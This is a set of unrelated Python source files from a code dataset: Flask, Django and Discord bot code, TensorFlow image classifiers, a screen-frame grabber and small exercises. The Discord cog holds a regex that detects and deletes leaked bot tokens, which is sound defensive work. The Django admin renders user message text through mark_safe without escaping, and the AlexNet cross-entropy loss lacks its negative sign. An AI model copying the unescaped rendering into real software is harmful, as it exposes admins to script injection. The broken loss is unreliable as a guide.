column, cell in enumerate(data[row]):\n            # emphasis on first column and last row\n            if column == 0 or row == lastrow:\n                cell = \"<b>\"+str(cell)+\"</b>\"\n\n            color=\"\"\n            if column != 0 and data[lastrow][column] >= day_log_goal:\n                color=goodcolor\n            elif column != 0 and data[0][column].endswith('S'):\n                color=wecolor\n            \n            if row == 0:\n                output += \"<th\"+color+\">\"+str(cell)+\"</th>\"\n            else:\n                output += \"<td\"+color+\">\"+str(cell)+\"</td>\"\n\n        output += \"</tr>\\n\"\n    output += \"\\n</tbody>\\n</table>\\n\"
\n    return output\n    \ndef get_dates_in_range(from_date, to_date):\n    dates = []\n    current_date = from_date\n    while True:\n        dates.append(current_date)\n        if current_date >= to_date:\n            break\n        current_date += timedelta(days=1)\n    return dates\n\n\ndef register_fonts():\n    pdfmetrics.registerFont(\n        TTFont('DejaVuSans', '/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf',\n               'UTF-8'))\n    pdfmetrics.registerFont(\n        TTFont('DejaVuSans-Bold',\n               '/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf',\n               'UTF-8'))\n\n\n@app.route(\"/worklog/<assignee>\")\ndef worklog(assignee):\n    if html == 1:\n        return get_worklog(assignee)\n\n    get_worklog(assignee)\n    return send_file('../%s.pdf' % assignee)\n\n@app.route(\"/worklog\")\n@app.route(\"/worklog/\")\ndef worklogentry():\n    return '''\nHello, World!\n'''\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=80)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"325541335","text":"from django.contrib import admin\nfrom django.conf.urls import url\nfrom django.utils.safestring import mark_safe\nfrom django.core.urlresolvers import reverse\nfrom .models import Room, Message\nfrom django.shortcuts import render\n\n\n\n@admin.register(Room)\nclass RoomAdmin(admin.ModelAdmin):\n    list_display = ('__str__', 'bot', 'bot_position', 'bot_reply_after')\n    list_filter = ('chat_type', 'created_at')\n    readonly_fields = ('users', 'bot', 'users_linked', 'messages')\n    prepopulated_fields = {\"label\": (\"name\",)}\n\n    def get_queryset(self, request):\n        qs = super(RoomAdmin, self).get_queryset(request)\n        return qs.select_related('bot')\n\n    def users_linked(self, obj):\n\n        return mark_safe(', '.join(['<a href=\"{}\">{}</a>'.format(\n            reverse(\"admin:user_user_change\", args=(x,)), x) for x in obj.users]))\n\n\n    users_linked.short_description = 'users'\n\n\n    def messages(self, obj):\n\n        return mark_safe('<br>
'.join(['{} : {}'.format(x.owner, x.text) for x in obj.messages.all().select_related('owner')]))\n\n\n    messages.short_description = 'messages'\n\n@admin.register(Message)\nclass MessageAdmin(admin.ModelAdmin):\n    search_fields = ('text', )\n\n\n    list_display = ('id', 'owner_link', 'text', 'room_link')\n\n    readonly_fields = ('owner', 'room', 'owner_link', 'room_link')\n\n    def get_queryset(self, request):\n        qs = super(MessageAdmin, self).get_queryset(request)\n        return qs.filter(owner__bot=None).select_related('room', 'owner')\n\n    def get_urls(self):\n        urls = super(MessageAdmin, self).get_urls()\n        my_urls = [\n            url(r'^profile/(?P<user_id>[0-9]+)$', self.profile),\n\n        ]\n        return my_urls + urls\n\n    def profile(self, request, user_id):\n        from chat.notifications import build_initial_notifications\n        from user.models import User\n        user = User.objects.get(id=user_id)\n        build_initial_notifications(user, {'rooms': []})\n\n        return render(\n            request,\n            'chat/admin/profile.html',\n            {\n                'title': 'Profile',\n                'user_id': user_id,\n\n\n\n            })\n\n    def owner_link(self, obj):\n        return mark_safe('<a href=\"{}\">{}</a>'.format(\n            reverse(\"admin:user_user_change\", args=(obj.owner.id,)),\n            obj.owner\n        ))\n    owner_link.short_description = 'user'\n\n    def room_link(self, obj):\n        return mark_safe('<a href=\"{}\">{}</a>'.format(\n            reverse(\"admin:chat_room_change\", args=(obj.room.id,)),\n            obj.room\n        ))\n    room_link.short_description = 'room'\n\n\n","sub_path":"chat/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"572526602","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\n\ndef read_image(image_path):\n    \"\"\"Leer una imagen y devolver un vector de la imagen\"\"\"\n    img = cv2.imread(image_path)\n    reshape_value = 1\n\n    for i in img.shape:\n        reshape_value *= i\n\n    return img.reshape((1, reshape_value)), img.shape\n\n\ndef show_image(image):\n    \"\"\" Muestra una sola imagen\"\"\"\n    img=cv2.imread(image)\n    plt.imshow(img)\n    plt.xticks([]), plt.yticks([])\n    plt.show()\n\n\ndef show_images(a, b):\n    \"\"\" Mostrar dos imágenes una al lado de la otra \"\"\"\n    imga=cv2.imread(a)\n    imgb=cv2.imread(b)\n    plot_image = np.concatenate((imga, imgb), axis=1)\n    plt.imshow(plot_image)\n    plt.xticks([]), plt.yticks([])\n    plt.show()\n","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"408336505","text":"import base64\nimport binascii\nimport logging\nimport re\nimport struct\nfrom datetime import datetime\n\nfrom discord import Colour, Message\nfrom discord.ext.commands import Bot\nfrom discord.utils import snowflake_time\n\nfrom bot.cogs.modlog import ModLog\nfrom bot.constants import Channels, Colours, Event, Icons\n\nlog = logging.getLogger(__name__)\n\nDELETION_MESSAGE_TEMPLATE = (\n    \"Hey {mention}! I noticed you posted a seemingly valid Discord API \"\n    \"token in your message and have removed your message to prevent abuse. \"\n    \"We recommend regenerating your token regardless, which you can do here: \"\n    \"<https://discordapp.com/developers/applications/me>\\n\"\n    \"Feel free to re-post it with the token removed. 
\"\n \"If you believe this was a mistake, please let us know!\"\n)\nDISCORD_EPOCH_TIMESTAMP = datetime(2017, 1, 1)\nTOKEN_EPOCH = 1_293_840_000\nTOKEN_RE = re.compile(\n r\"(?<=(\\\"|'))\" # Lookbehind: Only match if there's a double or single quote in front\n r\"[^\\s\\.]+\" # Matches token part 1: The user ID string, encoded as base64\n r\"\\.\" # Matches a literal dot between the token parts\n r\"[^\\s\\.]+\" # Matches token part 2: The creation timestamp, as an integer\n r\"\\.\" # Matches a literal dot between the token parts\n r\"[^\\s\\.]+\" # Matches token part 3: The HMAC, unused by us, but check that it isn't empty\n r\"(?=(\\\"|'))\" # Lookahead: Only match if there's a double or single quote after\n)\n\n\nclass TokenRemover:\n \"\"\"Scans messages for potential discord.py bot tokens and removes them.\"\"\"\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n @property\n def mod_log(self) -> ModLog:\n return self.bot.get_cog(\"ModLog\")\n\n async def on_message(self, msg: Message):\n if msg.author.bot:\n return\n\n maybe_match = TOKEN_RE.search(msg.content)\n if maybe_match is None:\n return\n\n try:\n user_id, creation_timestamp, hmac = maybe_match.group(0).split('.')\n except ValueError:\n return\n\n if self.is_valid_user_id(user_id) and self.is_valid_timestamp(creation_timestamp):\n self.mod_log.ignore(Event.message_delete, msg.id)\n await msg.delete()\n await msg.channel.send(DELETION_MESSAGE_TEMPLATE.format(mention=msg.author.mention))\n\n message = (\n \"Censored a seemingly valid token sent by \"\n f\"{msg.author} (`{msg.author.id}`) in {msg.channel.mention}, token was \"\n f\"`{user_id}.{creation_timestamp}.{'x' * len(hmac)}`\"\n )\n log.debug(message)\n\n # Send pretty mod log embed to mod-alerts\n await self.mod_log.send_log_message(\n icon_url=Icons.token_removed,\n colour=Colour(Colours.soft_red),\n title=\"Token removed!\",\n text=message,\n thumbnail=msg.author.avatar_url_as(static_format=\"png\"),\n channel_id=Channels.mod_alerts,\n )\n\n @staticmethod\n def is_valid_user_id(b64_content: str) -> bool:\n b64_content += '=' * (-len(b64_content) % 4)\n\n try:\n content: bytes = base64.b64decode(b64_content)\n return content.decode('utf-8').isnumeric()\n except (binascii.Error, UnicodeDecodeError):\n return False\n\n @staticmethod\n def is_valid_timestamp(b64_content: str) -> bool:\n b64_content += '=' * (-len(b64_content) % 4)\n\n try:\n content = base64.urlsafe_b64decode(b64_content)\n snowflake = struct.unpack('i', content)[0]\n except (binascii.Error, struct.error):\n return False\n return snowflake_time(snowflake + TOKEN_EPOCH) < DISCORD_EPOCH_TIMESTAMP\n\n\ndef setup(bot: Bot):\n bot.add_cog(TokenRemover(bot))\n log.info(\"Cog loaded: TokenRemover\")\n","sub_path":"bot/cogs/token_remover.py","file_name":"token_remover.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"527113309","text":"import tensorflow as tf\nimport numpy as np\nimport sys\n\nFLAGS = tf.app.flags.FLAGS\n\nnum_epochs = 100\n\ntf.app.flags.DEFINE_float('weight_decay', 0.0005,\n \"\"\" \"\"\")\ntf.app.flags.DEFINE_float('alpha', 0.1,\n \"\"\"Leaky RElu param\"\"\")\n\ndef _variable_on_cpu(name, shape, initializer):\n with tf.device('/cpu:0'):\n var = tf.get_variable(name, shape, initializer=initializer)\n return var\n\n\ndef _variable_with_weight_decay(name, shape, stddev, wd):\n \"\"\"Helper to create an initialized Variable with weight decay.\n Note that the Variable is initialized with a 
truncated normal distribution.\n A weight decay is added only if one is specified.\n Args:\n name: name of the variable\n shape: list of ints\n stddev: standard deviation of a truncated Gaussian\n wd: add L2Loss weight decay multiplied by this float. If None, weight\n decay is not added for this Variable.\n Returns:\n Variable Tensor\n \"\"\"\n var = _variable_on_cpu(name, shape,\n tf.truncated_normal_initializer(stddev=stddev))\n if wd:\n weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')\n weight_decay.set_shape([])\n tf.add_to_collection('losses', weight_decay)\n return var\n\n\ndef _activation_summary(x):\n tensor_name = x.op.name\n tf.histogram_summary(tensor_name + '/activations', x)\n tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))\n\n'''\ndef _conv_layer(inputs, kernel_size, stride, num_features, idx):\n with tf.variable_scope('{0}_conv'.format(idx)) as scope:\n input_channels = inputs.get_shape()[3]\n\n weights = _variable_with_weight_decay('weights', shape=[kernel_size, kernel_size, input_channels, num_features], stddev=0.1, wd=FLAGS.weight_decay)\n biases = _variable_on_cpu('biases', [num_features], tf.constant_initializer(0.1))\n\n conv = tf.nn.conv2d(inputs, weights, strides=[1, stride, stride, 1], padding='SAME')\n conv_biased = tf.nn.bias_add(conv, biases)\n\n #Leaky ReLU\n conv_rect = tf.maximum(FLAGS.alpha*conv_biased, conv_biased, name='{0}_conv'.format(idx))\n return conv_rect\n'''\n\ndef _fc_layer(inputs, hiddens, idx, flat, linear):\n with tf.variable_scope('fc{0}'.format(idx)) as scope:\n input_shape = inputs.get_shape().as_list()\n if flat:\n dim = input_shape[1]*input_shape[2]*input_shape[3]\n inputs_processed = tf.reshape(inputs, [-1,dim])\n else:\n dim = input_shape[1]\n inputs_processed = inputs\n\n weights = _variable_with_weight_decay('weights', shape=[dim,hiddens],stddev=0.01, wd=FLAGS.weight_decay)\n biases = _variable_on_cpu('biases', [hiddens], tf.constant_initializer(0.01))\n if linear:\n return tf.add(tf.matmul(inputs_processed,weights),biases,name=str(idx)+'_fc')\n\n ttt = tf.matmul(inputs_processed, weights)\n ip = tf.add(ttt,biases)\n return tf.maximum(FLAGS.alpha*ip,ip,name=str(idx)+'_fc')\n\n\"\"\"\nReplicating alexnet\nhttps://github.com/tensorflow/tensorflow/blob/master/tensorflow/models/image/alexnet/alexnet_benchmark.py\n\"\"\"\ndef inference(images, name):\n\n parameters = []\n\n # convolution 1\n with tf.name_scope('conv1') as scope:\n kernel = tf.Variable(tf.truncated_normal([11, 11, 3, 64], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(images, kernel, [1,4,4,1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(bias, name=scope)\n parameters += [kernel, biases]\n\n conv1 = tf.nn.dropout(conv1, .85)\n\n lrn1 = tf.nn.local_response_normalization(conv1, depth_radius=2, alpha=2e-05, beta=0.75, bias=1.0)\n conv1 = lrn1\n\n # pooling 1\n pool1 = tf.nn.max_pool(conv1, ksize=[1,3,3,1], strides=[1,2,2,1], padding='VALID', name='pool1')\n\n # convolution 2\n with tf.name_scope('conv2') as scope:\n kernel = tf.Variable(tf.truncated_normal([5, 5, 64, 192], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv2 = tf.nn.relu(bias, name=scope)\n\n parameters += 
[kernel, biases]\n\n conv2 = tf.nn.dropout(conv2, .85)\n\n lrn2 = tf.nn.local_response_normalization(conv2, depth_radius=2, alpha=2e-05, beta=0.75, bias=1.0)\n conv2 = lrn2\n\n # pooling 2\n pool2 = tf.nn.max_pool(conv2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='VALID', name='pool2')\n\n # conv3\n with tf.name_scope('conv3') as scope:\n kernel = tf.Variable(tf.truncated_normal([3, 3, 192, 384], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv3 = tf.nn.relu(bias, name=scope)\n\n parameters += [kernel, biases]\n\n # conv4\n with tf.name_scope('conv4') as scope:\n kernel = tf.Variable(tf.truncated_normal([3, 3, 384, 256], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv4 = tf.nn.relu(bias, name=scope)\n\n parameters += [kernel, biases]\n\n # conv5\n with tf.name_scope('conv5') as scope:\n kernel = tf.Variable(tf.truncated_normal([3, 3, 256, 256], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv4, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv5 = tf.nn.relu(bias, name=scope)\n\n parameters += [kernel, biases]\n\n # pooling 5\n pool5 = tf.nn.max_pool(conv5, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='VALID', name='pool5')\n\n # fully connected\n #fc = _fc_layer(pool5, 1, 'fc1', True, False)\n\n fc1 = _fc_layer(pool5, 4096, 'fc1', True, False)\n fc2 = _fc_layer(fc1, 4096, 'fc2', False, False)\n fc3 = _fc_layer(fc2, 2, 'fc3', False, False)\n\n y_1 = fc3\n\n# if name == \"train\":\n# fc6_dropout = tf.nn.dropout(fc6, .5)\n# elif name == \"test\":\n# fc6_dropout = tf.nn.dropout(fc6, 1)\n\n #out_shape = tf.pack([config.batch_size, 32, 32, 32])\n\n #print pool5\n #exit()\n #y_1 = _fc_layer(pool5, 1, 'y_1', False, True)\n\n # just for tensorboard\n _activation_summary(y_1)\n\n return y_1\n\n\ndef loss (logits, labels):\n #print logits\n #print labels\n #cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels, name='cross_entropy_per_example')\n #cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n #tf.add_to_collection('losses', cross_entropy_mean)\n #return tf.add_n(tf.get_collection('losses'), name='total_loss')\n \n \"\"\" cross entropy loss by converting correcte_output to a one hot vector\"\"\"\n #correct_output_one_hot = architecture.one_hot(correct_output)\n error = tf.reduce_mean(tf.reduce_sum(labels * tf.log(logits), reduction_indices=[1]))\n tf.scalar_summary('loss', error)\n return error\n\n","sub_path":"model/architecture.py","file_name":"architecture.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"492775897","text":"'''\n1. 아직 데이터셋이 없어서 검증 불가\n2. input image의 크기에 따라서 모델 수정 가능성\n3. 데이터셋의 크기에 따라 accuracy가 낮아질 수 있어서 그때에도 hyperparameter (ex.learning rate, batch size ... ) 및 모델 수정 가능성\n4. 한 파일에서 데이터를 불러오고, 전처리를 하고, 모델을 만들고, 학습을 진행하기 때문에 분산해서 만들 생각? 
도 있음\n'''\n\nimport tensorflow as tf\n# Load pickled data\nimport pickle\nfrom matplotlib import pyplot\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom sklearn.utils import shuffle\n#from skimage import exposure\n\n#현재 데이터셋이 없어서 검증 불가\n'''\ntraining_file = \"/Users/harshit.sharma/Desktop/udacity_selfdriving/CarND-Traffic-Sign-Classifier-Project/traffic-signs-data/train.p\"\nvalidation_file = \"/Users/harshit.sharma/Desktop/udacity_selfdriving/CarND-Traffic-Sign-Classifier-Project/traffic-signs-data/valid.p\"\ntesting_file = \"/Users/harshit.sharma/Desktop/udacity_selfdriving/CarND-Traffic-Sign-Classifier-Project/traffic-signs-data/test.p\"\n\nwith open(training_file, mode='rb') as f:\n train = pickle.load(f)\nwith open(validation_file, mode='rb') as f:\n valid = pickle.load(f)\nwith open(testing_file, mode='rb') as f:\n test = pickle.load(f)\n'''\n\nX_train, y_train = train['features'], train['labels']\nX_valid, y_valid = valid['features'], valid['labels']\nX_test, y_test = test['features'], test['labels']\n\n\n# TODO: Number of training examples\nn_train = len(X_train)\n\n# TODO: Number of validation examples\nn_validation = len(X_valid)\n\n# TODO: Number of testing examples.\nn_test = len(X_test)\n\n# TODO: What's the shape of an traffic sign image?\n# TODO: 모든 데이터셋의 shape가 동일해야함.\nimage_shape = np.array(X_train[0]).shape\n\n# TODO: How many unique classes/labels there are in the dataset.\nn_classes = len(set(y_train))\nsign_classes, class_indices, class_counts = np.unique(y_train, return_index = True, return_counts = True)\n\npyplot.bar( np.arange( 43 ), class_counts, align='center' )\npyplot.xlabel('Class')\npyplot.ylabel('Number of training examples')\npyplot.xlim([-1, 43])\npyplot.show()\nprint(\"Number of training examples =\", n_train)\nprint(\"Number of testing examples =\", n_test)\nprint(\"Image data shape =\", image_shape)\nprint(\"Number of classes =\", n_classes)\nprint(\"Number of validation examples=\",n_validation)\n\n\n\nindex = random.randint(0, len(X_train))\nimage = X_train[index].squeeze()\n\nplt.figure(figsize=(1,1))\nplt.imshow(image, cmap=\"gray\")\nprint(y_train[index])\n\n\n\n# Data preprocessing : 이미지 전처리\ndef preprocess_dataset(X, y = None):\n #print(X.shape)\n #Convert to grayscale, e.g. 
single Y channel\n X = 0.299 * X[:, :, :, 0] + 0.587 * X[:, :, :, 1] + 0.114 * X[:, :, :, 2]\n #Scale features to be in [0, 1]\n X = (X / 255.).astype(np.float32)\n # Add a single grayscale channel\n X = X.reshape(X.shape + (1,))\n return X, y\nX_test, y_test = preprocess_dataset(X_test,y_test)\nX,y = X_train,y_train\nX_train,y_train = preprocess_dataset(X_train,y_train)\n#print(X_train.shape)\nX_train, y_train = shuffle(X_train, y_train)\n#X_train = (X_train -128)/128\nX_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train, test_size=0.20)\n\n\nEPOCHS = 40\nBATCH_SIZE = 128\ndropout1 = 0.90 # Dropout, probability to keep units\ndropout2 = 0.80\ndropout3 = 0.70\ndropout4 = 0.50\n\nfrom tensorflow.contrib.layers import flatten\n\nmu = 0\nsigma = 0.1\nlayer1_weight = tf.Variable(tf.truncated_normal([5, 5, 1, 6], mean=mu, stddev=sigma))\nlayer1_bias = tf.Variable(tf.zeros(6))\nlayer2_weight = tf.Variable(tf.truncated_normal([5, 5, 6, 16], mean=mu, stddev=sigma))\nlayer2_bias = tf.Variable(tf.zeros(16))\nflat_weight = tf.Variable(tf.truncated_normal([400, 120], mean=mu, stddev=sigma))\nbias_flat = tf.Variable(tf.zeros(120))\nflat_weight2 = tf.Variable(tf.truncated_normal([120, 84], mean=mu, stddev=sigma))\nbias_flat2 = tf.Variable(tf.zeros(84))\nflat_weight3 = tf.Variable(tf.truncated_normal([84, 43], mean=mu, stddev=sigma))\nbias_flat3 = tf.Variable(tf.zeros(43))\n\n\ndef LeNet(x, train=True):\n # Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer\n x = tf.nn.conv2d(x, layer1_weight, strides=[1, 1, 1, 1], padding='VALID')\n x = tf.nn.bias_add(x, layer1_bias)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n if (train):\n x = tf.nn.dropout(x, dropout1)\n\n x = tf.nn.conv2d(x, layer2_weight, strides=[1, 1, 1, 1], padding='VALID')\n x = tf.nn.bias_add(x, layer2_bias)\n x = tf.nn.relu(x)\n conv2 = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n if (train):\n conv2 = tf.nn.dropout(conv2, dropout2)\n\n fc0 = flatten(conv2)\n fc1 = tf.add(tf.matmul(fc0, flat_weight), bias_flat)\n fc1 = tf.nn.relu(fc1)\n if (train):\n fc1 = tf.nn.dropout(fc1, dropout3)\n\n fc1 = tf.add(tf.matmul(fc1, flat_weight2), bias_flat2)\n fc1 = tf.nn.relu(fc1)\n if (train):\n fc1 = tf.nn.dropout(fc1, dropout4)\n fc1 = tf.add(tf.matmul(fc1, flat_weight3), bias_flat3)\n logits = tf.nn.relu(fc1)\n\n return logits\n\nx = tf.placeholder(tf.float32, (None, 32, 32, 1))\ny = tf.placeholder(tf.int32, (None))\nkeep_prob = tf.placeholder(tf.float32) #dropout (keep probability)\none_hot_y = tf.one_hot(y, 43)\n\nrate = 0.001\n\nlogits = LeNet(x)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)\nloss_operation = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate=rate)\n\ntraining_operation = optimizer.minimize(loss_operation)\nlogits_2 = LeNet(x)\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsaver = tf.train.Saver()\nsession = tf.Session()\nsession.run(tf.global_variables_initializer())\n\n\ndef evaluate(X_data, y_data):\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset + BATCH_SIZE], y_data[offset:offset + BATCH_SIZE]\n accuracy = sess.run(accuracy_operation, 
feed_dict={x: batch_x, y: batch_y})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples\n\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n num_examples = len(X_train)\n\n print(\"Training...\")\n print()\n for i in range(EPOCHS):\n X_train, y_train = shuffle(X_train, y_train)\n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})\n\n validation_accuracy = evaluate(X_validation, y_validation)\n print(\"EPOCH {} ...\".format(i + 1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n\n saver.save(sess, './lenet')\n print(\"Model saved\")\n\n\nwith tf.Session() as sess:\n saver.restore(sess, './lenet')\n test_accuracy = evaluate(X_test, y_test)\n print(\"Test Accuracy = {:.3f}\".format(test_accuracy))","sub_path":"rsc/DeepLearning/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"80220313","text":"import numpy as np\n\nfrom PIL import Image\n\nimport gi\ngi.require_version('Gdk', '3.0')\n\nfrom gi.repository import Gdk\n\nfrom redis import StrictRedis\n\nfrom lib.config import config\n\nimport time\nfrom datetime import datetime\n\nimport skimage.transform\nimport skimage.color\n\nfrom lib.game_frame import GameFrame\nfrom lib.game_frame_buffer import GameFrameBuffer\n\n\nredis_client = StrictRedis(**config[\"redis\"])\n\n\nclass FrameGrabber:\n\n def __init__(self, width=640, height=480, x_offset=0, y_offset=0, fps=30, buffer_seconds=5):\n self.width = width\n self.height = height\n\n self.x_offset = x_offset\n self.y_offset = y_offset\n\n self.frame_time = 1 / fps\n self.frame_buffer_size = buffer_seconds * fps\n\n self.redis_client = redis_client\n\n # Clear any previously stored frames\n self.redis_client.delete(config[\"frame_grabber\"][\"redis_key\"])\n\n def start(self):\n while True:\n cycle_start = datetime.utcnow()\n frame = self.grab_frame()\n\n self.redis_client.lpush(config[\"frame_grabber\"][\"redis_key\"], frame.tobytes())\n self.redis_client.ltrim(config[\"frame_grabber\"][\"redis_key\"], 0, self.frame_buffer_size)\n\n mini_frame = np.array(\n skimage.transform.resize(\n frame,\n (frame.shape[0] // 8, frame.shape[1] // 8),\n order=0,\n preserve_range=True\n ),\n dtype=\"uint8\"\n )\n\n mini_frame_gray = np.array(skimage.color.rgb2gray(mini_frame), dtype=\"float16\")\n\n self.redis_client.lpush(config[\"frame_grabber\"][\"redis_key\"] + \":MINI\", mini_frame_gray.tobytes())\n self.redis_client.ltrim(config[\"frame_grabber\"][\"redis_key\"] + \":MINI\", 0, self.frame_buffer_size)\n\n cycle_end = datetime.utcnow()\n\n cycle_duration = (cycle_end - cycle_start).microseconds / 1000000\n frame_time_left = self.frame_time - cycle_duration\n\n if frame_time_left > 0:\n time.sleep(frame_time_left)\n\n def grab_frame(self):\n window = Gdk.get_default_root_window()\n\n frame_buffer = Gdk.pixbuf_get_from_window(window, self.x_offset, self.y_offset, self.width, self.height)\n frame_buffer_data = frame_buffer.get_pixels()\n\n stride = frame_buffer.props.rowstride\n mode = \"RGB\"\n\n if frame_buffer.props.has_alpha:\n mode = \"RGBA\"\n\n pil_frame = Image.frombytes(mode, (self.width, self.height), frame_buffer_data, \"raw\", mode, stride)\n frame = np.array(pil_frame)\n\n return frame\n\n @classmethod\n def get_frames(cls, 
frame_buffer_indices, frame_shape=None, mode=\"BOTH\"):\n game_frame_buffer = GameFrameBuffer(size=len(frame_buffer_indices))\n\n for i in frame_buffer_indices:\n game_frame = None\n\n if mode in [\"FULL\", \"BOTH\"]:\n frame_bytes = redis_client.lindex(config[\"frame_grabber\"][\"redis_key\"], i)\n frame_array = np.fromstring(frame_bytes, dtype=\"uint8\").reshape(frame_shape)\n\n game_frame = GameFrame(frame_array)\n\n if mode in [\"MINI\", \"BOTH\"]:\n mini_frame_shape = (frame_shape[0] // 8, frame_shape[1] // 8)\n\n mini_frame_bytes = redis_client.lindex(config[\"frame_grabber\"][\"redis_key\"] + \":MINI\", i)\n mini_frame_array = np.fromstring(mini_frame_bytes, dtype=\"float16\").reshape(mini_frame_shape)\n\n if mode == \"BOTH\":\n game_frame.frame_variants[\"eighth_grayscale\"] = mini_frame_array\n elif mode == \"MINI\":\n game_frame = GameFrame(mini_frame_array, frame_variants={\"eighth_grayscale\": mini_frame_array})\n\n game_frame_buffer.add_game_frame(game_frame)\n\n return game_frame_buffer\n","sub_path":"lib/frame_grabber.py","file_name":"frame_grabber.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"213169695","text":"class Point:\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n\n def __add__(self, other):\n return Point(self.x+other.x, self.y+other.y)\n\n\npoint = Point(1, 1)\npoint2 = Point(1, 1)\npoint3 = point + point2\nprint(point3.x)\nprint(point3.y)\n\n'''\nWrite a Python program to combine two dictionaries adding values for common keys.\nd1 = {'a': 100, 'b': 200, 'c':300}\nd2 = {'a': 300, 'b': 200, 'd':400}\n\n{'a': 400, 'b': 400, 'd': 400, 'c': 300}\n\n'''\n\n\ndef combine_dictionary(dic1, dic2):\n for key, value in dic1.items():\n if key in dic2:\n dic2[key] = dic1[key] + dic2[key]\n else:\n dic2[key] = value\n return dic2\n\n\nd1 = {'a': 100, 'b': 200, 'c': 300}\nd2 = {'a': 300, 'b': 200, 'd': 400}\nprint(combine_dictionary(d1, d2))\n","sub_path":"python_demo_programs/2021/example_20210808.py","file_name":"example_20210808.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"572222232","text":"# coding=utf-8\nfrom __future__ import print_function, unicode_literals, absolute_import\nimport unittest\nimport os\nimport sys\n\ndirname = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nif dirname not in sys.path:\n sys.path.insert(0, dirname)\n\n\nclass TestValue(unittest.TestCase):\n\n def test(self):\n from container import Queue\n\n queue = Queue.Queue()\n for x in range(0, 10):\n queue.push(x)\n\n self.assertEqual(len(queue), 10)\n\n self.assertEqual(queue.front(), 0)\n\n queue.pop()\n\n self.assertEqual(len(queue), 9)\n self.assertEqual(queue.front(), 1)\n for _ in range(0, 9):\n queue.pop()\n with self.assertRaises(Queue.QueueEmptyException):\n queue.pop()\n\n\nif __name__ == '__main__':\n 